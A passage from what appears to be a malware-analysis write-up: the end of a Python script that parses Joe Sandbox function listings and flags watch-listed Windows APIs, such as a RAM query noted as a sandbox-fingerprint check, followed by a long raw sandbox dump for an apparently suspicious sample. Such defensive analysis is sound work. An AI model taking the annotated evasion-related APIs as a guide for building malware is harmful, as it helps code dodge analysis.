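    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Generic "• Key: value" line (Source File, API ID, Instruction Fuzzy Hash, ...).
KV_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")

# Assumed watch-list; the annotations are the editor's, not report output.
WATCH_APIS = {
    "GlobalMemoryStatusEx": "physical RAM query, a common small-VM/sandbox fingerprint",
    "OpenProcessToken": "process token access, precedes privilege/integrity checks",
    "OpenThreadToken": "thread token access, same purpose under impersonation",
    "InternetCrackUrlW": "URL parsing, usually adjacent to download code",
    "WNetUseConnectionW": "maps remote shares or printers, a reach-out to other hosts",
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                          # code address of the call site
    subcall_of: Optional[int] = None  # set when inherited from a callee


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    associated: List[str] = field(default_factory=list)
    meta: Dict[str, str] = field(default_factory=dict)


def parse_report(text: str) -> List[FunctionRecord]:
    """A record ends at its 'Instruction Fuzzy Hash' line, the last field printed."""
    records: List[FunctionRecord] = []
    cur = FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            sub = int(m["sub"], 16) if m["sub"] else None
            cur.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), sub))
            continue
        m = KV_RE.match(line)
        if not m:
            continue  # section headers such as "APIs" or "Similarity"
        # The web page fuses its "Download File" link label onto dump names; drop it.
        key, val = m["key"], m["val"].split("Download File")[0].strip()
        if key == "Associated":
            cur.associated.append(val)
        else:
            cur.meta[key] = val
        if key == "Instruction Fuzzy Hash":
            records.append(cur)
            cur = FunctionRecord()
    return records


def triage(records: List[FunctionRecord]) -> List[Tuple[str, List[str]]]:
    """(API ID, matched names) for records whose *direct* calls hit the watch-list;
    inherited subcall lines are ignored so one helper does not flag every caller."""
    hits = []
    for rec in records:
        direct = {c.name for c in rec.apis if c.subcall_of is None}
        found = sorted(direct & set(WATCH_APIS))
        if found:
            hits.append((rec.meta.get("API ID", ""), found))
    return hits


# Constructed excerpt: three records copied from this report's own listing.
SAMPLE_REPORT = """\
APIs
• EnterCriticalSection.KERNEL32(?), ref: 003C6BE6
  • Part of subcall function 003C76C4: _memset.LIBCMT ref: 003C76F9
• _memmove.LIBCMT ref: 003C6C09
• _memset.LIBCMT ref: 003C6C16
• LeaveCriticalSection.KERNEL32(?), ref: 003C6C26
Memory Dump Source
• Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
• Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: CriticalSection_memset$EnterLeave_memmove
• String ID:
• Instruction Fuzzy Hash: C3F05E3A200204ABCF026F55DC85E8ABF29EF45320F04C0A5FE089E267D771E911CBB4
APIs
• GetCurrentThread.KERNEL32 ref: 003B871B
• OpenThreadToken.ADVAPI32(00000000,?,?,?,003B82E6), ref: 003B8722
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,003B82E6), ref: 003B872F
• OpenProcessToken.ADVAPI32(00000000,?,?,?,003B82E6), ref: 003B8736
Similarity
• API ID: CurrentOpenProcessThreadToken
• Instruction Fuzzy Hash: DCE086366122529FD7315FB0AD4DB963BACEF90795F158828B385CD0C0DA749841C750
APIs
• Sleep.KERNEL32(00000000), ref: 00372968
• GlobalMemoryStatusEx.KERNEL32(?), ref: 00372981
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
• Instruction Fuzzy Hash: B05155B24087449BD321EF20D886BABBBECFF89344F41895DF2D8450A5DF318528CB66
"""

if __name__ == "__main__":
    for api_id, found in triage(parse_report(SAMPLE_REPORT)):
        print(api_id, "->", "; ".join(f"{n} ({WATCH_APIS[n]})" for n in found))
```

Run on the excerpt it reports the token function and the memory-status function and stays silent on the critical-section one, whose only `_memset` of interest is inherited from the callee at 003C76C4. Pasting the whole page's function listing into `parse_report` works the same way, and grouping the resulting records by their `API ID` (the API-name fingerprint Joe Sandbox prints under Similarity) is a quick way to find the same runtime routine recurring across dumps.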
                                                            APIs
                                                              • Part of subcall function 00364F0B: __fread_nolock.LIBCMT ref: 00364F29
                                                            • _wcscmp.LIBCMT ref: 003C9824
                                                            • _wcscmp.LIBCMT ref: 003C9837
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
• Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _wcscmp$__fread_nolock
                                                            • String ID: FILE
                                                            • API String ID: 4029003684-3121273764
                                                            • Opcode ID: da0437dc110fa31c40c77900b36fadef917e61abddf43c1122119af3add7d83b
                                                            • Instruction ID: 59a6b92258ae428b4c784bb7334ded044bfd754d193912f40322a78becad1da2
                                                            • Opcode Fuzzy Hash: da0437dc110fa31c40c77900b36fadef917e61abddf43c1122119af3add7d83b
                                                            • Instruction Fuzzy Hash: 3841DB71A00309BADF229BA5CC49FEFB7BDDF85710F01446AF904EB185D6719E048B65
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
• Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID: DdB$DdB
                                                            • API String ID: 1473721057-1576950555
                                                            • Opcode ID: 34b7330744f9174eecde8723ab03eba193cd751d2c7cb2a4939bb8d86ed47def
                                                            • Instruction ID: a6ed08982816c587d95862d6a9aae34e970d59d9420a0b56d7361569a88c7fd8
                                                            • Opcode Fuzzy Hash: 34b7330744f9174eecde8723ab03eba193cd751d2c7cb2a4939bb8d86ed47def
                                                            • Instruction Fuzzy Hash: 855121786087418FD766DF18C480A1ABBF1FB99344F96885DE8859B324D332EC81CF96
                                                            APIs
                                                            • _memset.LIBCMT ref: 003D259E
                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 003D25D4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
• Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CrackInternet_memset
                                                            • String ID: |
                                                            • API String ID: 1413715105-2343686810
                                                            • Opcode ID: 880b4894460f23e918a7f78e74c4da53eabd2d7c29e45b3626cf60460bb4f9c8
                                                            • Instruction ID: b1748c5b32ac76d98da0baee56c20ff033ef56caa4f8a864591abf7a9b9cb9a5
                                                            • Opcode Fuzzy Hash: 880b4894460f23e918a7f78e74c4da53eabd2d7c29e45b3626cf60460bb4f9c8
                                                            • Instruction Fuzzy Hash: D6311A71800219ABCF02EFA1DC85EEEBFB8FF18314F10405AF955AA265DB319955DB60
                                                            APIs
                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 003E7B61
                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003E7B76
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
• Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: '
                                                            • API String ID: 3850602802-1997036262
                                                            • Opcode ID: 20ac758d4af508b5d1b0a44db469d641b07b6c14575019f6b11c7bd43c9e8110
                                                            • Instruction ID: 3f1531183d23ce4646805f9d8b0c41561ff64eb5b8e59e12b986c930f54972d3
                                                            • Opcode Fuzzy Hash: 20ac758d4af508b5d1b0a44db469d641b07b6c14575019f6b11c7bd43c9e8110
                                                            • Instruction Fuzzy Hash: 83411B74A0525A9FDB15CF65D881BEABBB9FF08300F11427AE904EB391E770A951CF90
                                                            APIs
                                                            • DestroyWindow.USER32(?,?,?,?), ref: 003E6B17
                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 003E6B53
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$DestroyMove
                                                            • String ID: static
                                                            • API String ID: 2139405536-2160076837
                                                            • Opcode ID: 7ff536277b00cdcc66e590700129d770616117074dc5da2abc6cabfda19bdedd
                                                            • Instruction ID: 01479ae36c9f9fcf19e3f9e3e4a25e80024d40c7046e78f7039f076d22b173a4
                                                            • Opcode Fuzzy Hash: 7ff536277b00cdcc66e590700129d770616117074dc5da2abc6cabfda19bdedd
                                                            • Instruction Fuzzy Hash: B731CF71200254AEDB129F26CC81BFB73ADFF987A0F108629F9A5D7190DB70AC81C760
                                                            APIs
                                                            • _memset.LIBCMT ref: 003C2911
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003C294C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: InfoItemMenu_memset
                                                            • String ID: 0
                                                            • API String ID: 2223754486-4108050209
                                                            • Opcode ID: bf2b6706b87843864f6b28b6f37f7bace1f9160ab0e67661288a52c23f7e8e50
                                                            • Instruction ID: 46539e966b7e1c037ac61daeb3da4c902b627d2da75ef221561618e818a33c9e
                                                            • Opcode Fuzzy Hash: bf2b6706b87843864f6b28b6f37f7bace1f9160ab0e67661288a52c23f7e8e50
                                                            • Instruction Fuzzy Hash: CA31BD31A00305EBEB2ADF58C885FAFBBB8EF45350F16002DE985EA1A0D7B09D54CB51
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 003E6761
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003E676C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: Combobox
                                                            • API String ID: 3850602802-2096851135
                                                            • Opcode ID: 2747675a9372dc5c601b315e03592bd36d371db18f0cbf63c7aca280370ce654
                                                            • Instruction ID: 3d494aa78a2674d19ffdd01a0637290a09798585e67521f29ab1a338f6427b7a
                                                            • Opcode Fuzzy Hash: 2747675a9372dc5c601b315e03592bd36d371db18f0cbf63c7aca280370ce654
                                                            • Instruction Fuzzy Hash: C711B6713002586FEF228F55CC81EFB376AEB543A8F114225F9149B2D0D671DC5187A0
                                                            APIs
                                                              • Part of subcall function 00361D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00361D73
                                                              • Part of subcall function 00361D35: GetStockObject.GDI32(00000011), ref: 00361D87
                                                              • Part of subcall function 00361D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00361D91
                                                            • GetWindowRect.USER32(00000000,?), ref: 003E6C71
                                                            • GetSysColor.USER32(00000012), ref: 003E6C8B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                            • String ID: static
                                                            • API String ID: 1983116058-2160076837
                                                            • Opcode ID: 6058ae61c73646a4bc6b68faaabd327ea96f6bd5f9394c6eed1387bd70800e84
                                                            • Instruction ID: 2d249cebef2edb121c710c6bec0d1649db31afefdb3d89928a6e4654918e78b9
                                                            • Opcode Fuzzy Hash: 6058ae61c73646a4bc6b68faaabd327ea96f6bd5f9394c6eed1387bd70800e84
                                                            • Instruction Fuzzy Hash: 7E218972610259AFDF05DFA9CC46AFA7BB8FB08304F104628F995D2280E730E850DB60
                                                            APIs
                                                            • GetWindowTextLengthW.USER32(00000000), ref: 003E69A2
                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003E69B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: LengthMessageSendTextWindow
                                                            • String ID: edit
                                                            • API String ID: 2978978980-2167791130
                                                            • Opcode ID: 5e2359e1e3feebeb0cc03d77cd57388059756d9e186da786225b3b53651ac82b
                                                            • Instruction ID: 884fa5feeca3d85b95f0d4340e9ca3925afa5571bff329821de2bc8604323d77
                                                            • Opcode Fuzzy Hash: 5e2359e1e3feebeb0cc03d77cd57388059756d9e186da786225b3b53651ac82b
                                                            • Instruction Fuzzy Hash: C4119D711001A8AFEB128E659C82AEB3669EB663B4F514724F9A0961E1C771DC509760
                                                            APIs
                                                            • _memset.LIBCMT ref: 003C2A22
                                                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 003C2A41
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: InfoItemMenu_memset
                                                            • String ID: 0
                                                            • API String ID: 2223754486-4108050209
                                                            • Opcode ID: fe494ac76d96a9122054999614a50f869d0aaecd0292aa2cda02cc6f046d931a
                                                            • Instruction ID: ea24e4fb2844b129b8fd696d0a2a66eb74d6ee09d0b44da3a2046affcaa0de06
                                                            • Opcode Fuzzy Hash: fe494ac76d96a9122054999614a50f869d0aaecd0292aa2cda02cc6f046d931a
                                                            • Instruction Fuzzy Hash: 9411083AA01518AFCF32EB98DC44FAB77BCAB45300F064039E855E7290DB70AD0AC795
                                                            APIs
                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 003D222C
                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 003D2255
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Internet$OpenOption
                                                            • String ID: <local>
                                                            • API String ID: 942729171-4266983199
                                                            • Opcode ID: ea5e95168a905da0ecde5c27664e7631a742d01d901c1cc0be4f9f5a79c44126
                                                            • Instruction ID: 4e8edb08eac8f48308ed58d8fc80a5c3e822c14eeeac6c55d6957a850b0d9896
                                                            • Opcode Fuzzy Hash: ea5e95168a905da0ecde5c27664e7631a742d01d901c1cc0be4f9f5a79c44126
                                                            • Instruction Fuzzy Hash: D2110272501265BEDB268F11AC84EFBFBACFF26351F10862BF90446640D2705990D6F0
                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00363C14,004252F8,?,?,?), ref: 0037096E
                                                              • Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06
                                                            • _wcscat.LIBCMT ref: 003A4CB7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: FullNamePath_memmove_wcscat
                                                            • String ID: SB
                                                            • API String ID: 257928180-3983915703
                                                            • Opcode ID: 005c0801b90214b17c6f4fcf6b31d508b9887dfc7c8d11d95a45e29dc3445357
                                                            • Instruction ID: 7315992da958bb8e8b16e9d4d4ab1a3c23a9ff7fea0552b4385f18796465ee5e
                                                            • Opcode Fuzzy Hash: 005c0801b90214b17c6f4fcf6b31d508b9887dfc7c8d11d95a45e29dc3445357
                                                            • Instruction Fuzzy Hash: 4B11E531A052189ACB12FB74C802EDE73F8EF09350B40C5A6BA48DB195EBB496844B14
                                                            APIs
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                              • Part of subcall function 003BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003BAABC
                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 003B8E73
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: 13eb8e29695fafbea7c5658c848325e15219b115143d83bf2c2b05e416cabf05
                                                            • Instruction ID: 2d31360ddf744b3652359c522eb3927acec43800e94aa0da7ec39f1eae7cd56a
                                                            • Opcode Fuzzy Hash: 13eb8e29695fafbea7c5658c848325e15219b115143d83bf2c2b05e416cabf05
                                                            • Instruction Fuzzy Hash: 24012471605228ABCB16FBA4CC819FE736CEF01320B104A19F9715B6E1DF319808C660
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock_memmove
                                                            • String ID: EA06
                                                            • API String ID: 1988441806-3962188686
                                                            • Opcode ID: dcd3b740a341242427aee971d1e09c81ee0a99b04a82370942c8bc085f18f4ca
                                                            • Instruction ID: 61caae64fed9a80aa9d7746dabc1d65c8d17ec58b317635cd1ea23610cd3bb36
                                                            • Opcode Fuzzy Hash: dcd3b740a341242427aee971d1e09c81ee0a99b04a82370942c8bc085f18f4ca
                                                            • Instruction Fuzzy Hash: DF01D6718046186EDB19DBA8C816EEABBF89B11301F00459EF553D6181E974AA088760
                                                            APIs
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                              • Part of subcall function 003BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003BAABC
                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 003B8D6B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: 6d94b374fa2f0abdf54fdee40bc6de289b0996ee530022838485d6ead604c5dc
                                                            • Instruction ID: 653a26673d7c33c44e57d93521ded935adaa0aa98d9e35969caf601c69d6833d
                                                            • Opcode Fuzzy Hash: 6d94b374fa2f0abdf54fdee40bc6de289b0996ee530022838485d6ead604c5dc
                                                            • Instruction Fuzzy Hash: 5501F271B41508ABCB17EBA0C992EFE73ACDF15300F10002EB9026B6E1DE249E08D671
                                                            APIs
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                              • Part of subcall function 003BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003BAABC
                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 003B8DEE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: cdf6132a38119be29a2e965d6b74dff76efc82b02635fedade89a1ec2312b9da
• Instruction ID: 5134c1d01654e9e8e230317003c9b26551574df0972275876a3701a343945761
• Opcode Fuzzy Hash: cdf6132a38119be29a2e965d6b74dff76efc82b02635fedade89a1ec2312b9da
• Instruction Fuzzy Hash: E3012671B45108BBCF13EBA4C992EFE73ACCF21304F10402AB901AB6D2DE258E08D671
APIs
• VariantInit.OLEAUT32(?), ref: 003BC534
  • Part of subcall function 003BC816: _memmove.LIBCMT ref: 003BC860
